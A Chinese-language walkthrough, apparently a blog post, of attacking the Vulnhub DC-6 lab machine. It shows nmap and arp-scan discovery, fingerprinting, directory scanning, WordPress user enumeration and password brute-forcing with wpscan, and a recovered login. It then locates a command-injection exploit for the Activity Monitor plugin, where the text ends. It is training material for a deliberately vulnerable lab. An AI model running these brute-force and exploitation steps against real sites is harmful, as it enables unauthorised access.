免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
目录
- 免责声明
- 前言
- 一、环境配置
- 二、信息收集
- 2.1 主机发现
- 2.1.1 nmap扫描存活主机
- 2.1.2 arp-scan扫描存活主机
- 2.2 端口扫描
- 2.3 指纹识别
- 2.3.1 尝试指纹识别
- 2.3.2 修改host文件
- 2.3.3 再次进行指纹识别
- 2.3.4 浏览器访问
- 2.3.5 Wappalyzer插件web指纹信息收集
- 2.4 目录扫描
- 2.4.1 dirb命令目录扫描
- 2.4.2 dirsearch命令目录扫描
- 2.5 尝试访问
- 2.5.1 尝试访问wp-admin
- 2.5.2 尝试访问wp-includes
- 三、渗透测试
- 3.1 wpscan爆破用户名
- 3.1.1 爆破用户名
- 3.1.2 保存用户名列表
- 3.2 生成密码字典
- 3.3 网页爆破
- 3.3.1 wpscan爆破
- 3.3.2 hydra爆破
- 3.4 mark用户相关
- 3.4.1 登录页面
- 3.4.2 Tools插件
- 3.4.3 漏洞搜索
- 3.4.4 查看poc文件
- 3.4.5 运行poc文件
- 3.4.6 反弹shell
- 3.4.6.1 kali监听6666端口
- 3.4.6.2 反弹shell
- 3.4.6.3 调用标准终端
- 3.4.7 尝试suid提权
- 3.4.8 更多系统信息
- 3.5 graham用户相关
- 3.5.1 切换graham用户
- 3.5.2 再次尝试sudo提权
- 3.5.3 bash写入backups.sh
- 3.6 jens用户相关
- 3.6.1 切换jens用户
- 3.6.2 查看suid可执行的命令
- 3.6.3 查看sudo可执行的命令
- 3.7 nmap提权
- 3.7.1 创建shell.nse文件
- 3.7.2 执行shell.nse文件
- 3.7.3 查看flag
- 渗透总结
- 参考文章
前言
今日测试内容渗透dc-6靶机:
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。
本文将介绍dc-6靶机渗透测试,内容包括nmap扫描,arp-scan扫描、whatweb及Wappalyzer网站指纹识别、dirb目录扫描或者dirsearch目录扫描、wpscan爆破wordpress用户名、生成密码字典、wpscan爆破登录页,xhydra爆破网页,最终使用nmap提取获得root权限,linux内核提权等内容。
DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
一、环境配置
靶机信息
| 官方下载链接 | https://www.vulnhub.com/entry/dc-6,315/ |
|---|---|
| 发布日期 | 2019年4月29日 |
| 靶场环境大小 | 619MB |
| 作者 | DCAU |
| 系列 | DC |
| 难度 | ★☆☆☆☆ |
渗透测试环境配置,请参考作者前面的内容,不再赘述:
vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849
二、信息收集
2.1 主机发现
2.1.1 nmap扫描存活主机
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:04 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00045s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.157
Host is up (0.00050s latency).
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00037s latency).
MAC Address: 00:50:56:F1:DB:25 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.09 seconds
2.1.2 arp-scan扫描存活主机
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.157 00:0c:29:c2:c2:87 VMware, Inc.
192.168.6.254 00:50:56:f1:db:25 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.324 seconds (110.15 hosts/sec). 4 responded
综上所示,排除kali攻击机IP,得靶场信息:
IP地址:192.168.6.157
MAC地址:00:0c:29:c2:c2:87
2.2 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-7 192.168.6.157
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:07 EDT
Nmap scan report for 192.168.6.157
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds
nmap端口扫描显示,靶机开放的端口有22和80端口,
22端口:ssh服务
80端口:http服务
2.3 指纹识别
2.3.1 尝试指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status : 301 Moved Permanently
Title : <None>
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://wordy/ (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-redirect-by (from headers)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Tue, 28 May 2024 15:11:47 GMT
Server: Apache/2.4.25 (Debian)
X-Redirect-By: WordPress
Location: http://wordy/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
结果显示:靶机为wordpress CMS内容管理器,没有获得wordpress版本信息,被重定向,解决方案进行下一步操作
2.3.2 修改host文件
向hosts文件中添加以下内容
192.168.6.157 wordy
──(root㉿kali)-[/home/kali]
└─# vim /etc/hosts
┌──(root㉿kali)-[/home/kali]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.6.154 dc-2
192.168.6.157 wordy
2.3.3 再次进行指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status : 301 Moved Permanently
Title : <None>
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://wordy/ (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-redirect-by (from headers)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Tue, 28 May 2024 15:25:30 GMT
Server: Apache/2.4.25 (Debian)
X-Redirect-By: WordPress
Location: http://wordy/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
WhatWeb report for http://wordy/
Status : 200 OK
Title : Wordy – Just another WordPress site
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], UncommonHeaders[link], WordPress[5.1.1]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 1.12.4
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : WordPress 5.1.1
[ PoweredBy ]
This plugin identifies instances of 'Powered by x' text and
attempts to extract the value for x.
String : WordPress
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : link (from headers)
[ WordPress ]
WordPress is an opensource blogging system commonly used as
a CMS.
Version : 5.1.1
Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.wordpress.org/
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 28 May 2024 15:25:32 GMT
Server: Apache/2.4.25 (Debian)
Link: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
Link: <http://wordy/>; rel=shortlink
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 18051
Connection: close
Content-Type: text/html; charset=UTF-8
2.3.4 浏览器访问
2.3.5 Wappalyzer插件web指纹信息收集
相关技术参数如下表:
| 项目名称 | 技术参数 |
|---|---|
| 内容管理系统 | WordPress5.1.1 |
| 编程语言 | php |
| 博客 | WordPress5.1.1 |
| 操作系统 | Debian |
| 安装字体 | Google Font API,Twitter Emoji_(Twemoji) |
| 数据库 | MySQL |
| 杂项 | RSS |
| JavaScript库 | jQuery Migrate 1.4.1,jQuery1.12.4 |
| Web 服务器 | Apache HTTPServer 2.4.25 |
| WordPress themes | Twenty Seventeen |
综上所述, 获得WordPress版本信息:
Version : 5.1.1
2.4 目录扫描
2.4.1 dirb命令目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.157
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:02:29 2024
URL_BASE: http://192.168.6.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.6.157/ ----
+ http://192.168.6.157/index.php (CODE:200|SIZE:53227)
+ http://192.168.6.157/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.6.157/wp-admin/
==> DIRECTORY: http://192.168.6.157/wp-content/
==> DIRECTORY: http://192.168.6.157/wp-includes/
+ http://192.168.6.157/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.6.157/wp-admin/ ----
+ http://192.168.6.157/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/css/
==> DIRECTORY: http://192.168.6.157/wp-admin/images/
==> DIRECTORY: http://192.168.6.157/wp-admin/includes/
+ http://192.168.6.157/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/js/
==> DIRECTORY: http://192.168.6.157/wp-admin/maint/
==> DIRECTORY: http://192.168.6.157/wp-admin/network/
==> DIRECTORY: http://192.168.6.157/wp-admin/user/
---- Entering directory: http://192.168.6.157/wp-content/ ----
+ http://192.168.6.157/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-content/plugins/
==> DIRECTORY: http://192.168.6.157/wp-content/themes/
==> DIRECTORY: http://192.168.6.157/wp-content/uploads/
---- Entering directory: http://192.168.6.157/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/network/ ----
+ http://192.168.6.157/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-admin/user/ ----
+ http://192.168.6.157/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/plugins/ ----
+ http://192.168.6.157/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/themes/ ----
+ http://192.168.6.157/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue May 28 12:03:03 2024
DOWNLOADED: 32284 - FOUND: 12
2.4.2 dirsearch命令目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.157 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.157/_24-05-28_12-05-18.txt
Target: http://192.168.6.157/
[12:05:18] Starting:
[12:05:21] 403 - 299B - /.ht_wsr.txt
[12:05:21] 403 - 302B - /.htaccess.orig
[12:05:21] 403 - 302B - /.htaccess.save
[12:05:21] 403 - 304B - /.htaccess.sample
[12:05:21] 403 - 302B - /.htaccess.bak1
[12:05:22] 403 - 300B - /.htaccess_sc
[12:05:22] 403 - 300B - /.htaccessBAK
[12:05:22] 403 - 301B - /.htaccessOLD2
[12:05:22] 403 - 292B - /.htm
[12:05:22] 403 - 293B - /.html
[12:05:22] 403 - 302B - /.htpasswd_test
[12:05:22] 403 - 298B - /.htpasswds
[12:05:22] 403 - 302B - /.htaccess_orig
[12:05:22] 403 - 299B - /.httr-oauth
[12:05:22] 403 - 303B - /.htaccess_extra
[12:05:22] 403 - 300B - /.htaccessOLD
[12:05:24] 403 - 292B - /.php
[12:05:24] 403 - 293B - /.php3
[12:06:05] 200 - 18KB - /index.php
[12:06:09] 200 - 7KB - /license.txt
[12:06:28] 200 - 3KB - /readme.html
[12:06:31] 403 - 301B - /server-status
[12:06:31] 403 - 302B - /server-status/
[12:06:50] 301 - 317B - /wp-admin -> http://192.168.6.157/wp-admin/
[12:06:50] 302 - 0B - /wp-admin/ -> http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.6.157%2Fwp-admin%2F&reauth=1
[12:06:51] 200 - 0B - /wp-config.php
[12:06:51] 500 - 3KB - /wp-admin/setup-config.php
[12:06:51] 400 - 1B - /wp-admin/admin-ajax.php
[12:06:51] 200 - 517B - /wp-admin/install.php
[12:06:51] 301 - 319B - /wp-content -> http://192.168.6.157/wp-content/
[12:06:51] 200 - 0B - /wp-content/
[12:06:51] 403 - 324B - /wp-content/plugins/akismet/admin.php
[12:06:51] 500 - 0B - /wp-content/plugins/hello.php
[12:06:51] 403 - 326B - /wp-content/plugins/akismet/akismet.php
[12:06:51] 200 - 456B - /wp-content/uploads/
[12:06:52] 200 - 1KB - /wp-login.php
[12:06:52] 302 - 0B - /wp-signup.php -> http://wordy/wp-login.php?action=register
[12:06:52] 500 - 0B - /wp-includes/rss-functions.php
[12:06:52] 200 - 0B - /wp-cron.php
[12:06:52] 200 - 4KB - /wp-includes/
[12:06:52] 301 - 320B - /wp-includes -> http://192.168.6.157/wp-includes/
[12:06:53] 405 - 42B - /xmlrpc.php
Task Completed
综上所述,发现一些特别的信息:
| 页面名称 | 目录地址 |
|---|---|
| 后台管理页面 | /wp-admin -> http://192.168.6.157/wp-admin/ |
| 文件包含页面 | /wp-includes -> http://192.168.6.157/wp-includes/ |
| 网站内容页面 | /wp-content -> http://192.168.6.157/wp-content/ |
| 网站注册页面 | /wp-signup.php -> http://wordy/wp-login.php?action=register |
dc-6靶机存在文件包含漏洞,越权访问等漏洞,O(∩_∩)O哈哈~
2.5 尝试访问
2.5.1 尝试访问wp-admin
链接地址:http://192.168.6.157/wp-admin/
返回页面:
2.5.2 尝试访问wp-includes
链接地址:http://192.168.6.157/wp-includes/
返回页面:
不登录,无法访问,思路:爆破用户名和密码
三、渗透测试
3.1 wpscan爆破用户名
3.1.1 爆破用户名
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://wordy -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 12:44:35 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 28 12:44:44 2024
[+] Requests Done: 71
[+] Cached Requests: 6
[+] Data Sent: 16.392 KB
[+] Data Received: 13.463 MB
[+] Memory used: 190.902 MB
[+] Elapsed time: 00:00:08
获得5个用户名:
| 用户名 | admin | graham | jens | mark | sarah |
|---|
3.1.2 保存用户名列表
依次执行以下命令,将用户名保存到users.txt文件中
──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# echo "admin\ngraham\njens\nmark\nsarah"> users.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
users.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat users.txt
admin
graham
jens
mark
sarah
保存用户名字典成功
3.2 生成密码字典
在访问靶场官网的时候,有以下提示:
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
passwords.txt users.txt
生成密码字典password.txt成功。
3.3 网页爆破
我们可以使用wpscan和xhydra爆破网页登录页,下面逐一介绍。
3.3.1 wpscan爆破
耗费时间约6分33秒!
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwords.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 13:43:00 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=========================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
Trying jens / !lak019b Time: 00:06:33 <=============================================== > (12547 / 15215) 82.46% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: mark, Password: helpdesk01
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 28 13:49:47 2024
[+] Requests Done: 12720
[+] Cached Requests: 5
[+] Data Sent: 6.222 MB
[+] Data Received: 7.74 MB
[+] Memory used: 312.531 MB
[+] Elapsed time: 00:06:46
3.3.2 hydra爆破
使用xhydra爆破网页登录页面,
参数设置如下:
Target :192.168.6.157
Protocol:http-post-form
Username List:/home/kali/dev_run_app/vulhub/dc-6/users.txt
Password List:/home/kali/dev_run_app/vulhub/dc-6/passwords.txt
Specific参数设置:
http/https URL:/wp-admin.php:log=USER&pwd=PASS:s=logout
最后点击start
无果,O(∩_∩)O哈哈~ pass
综上所述,获得一个用户名和密码:
| 序号 | 用户名 | 密码 |
|---|---|---|
| 1 | mark | helpdesk01 |
3.4 mark用户相关
3.4.1 登录页面
利用爆破获得的用户和密码登录管理页面
管理页面:http://192.168.6.157/wp-admin/
3.4.2 Tools插件
登录成功以后,发现Activity_monitor插件
尝试使用whoami:
尝试id命令:
综上所述,可以发现有RCE(远程命令执行)漏洞
3.4.3 漏洞搜索
┌──(root㉿kali)-[/home/kali]
└─# searchsploit -w Activity monitor
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service | https://www.exploit-db.com/exploits/22690
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout | https://www.exploit-db.com/exploits/19900
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | https://www.exploit-db.com/exploits/45274
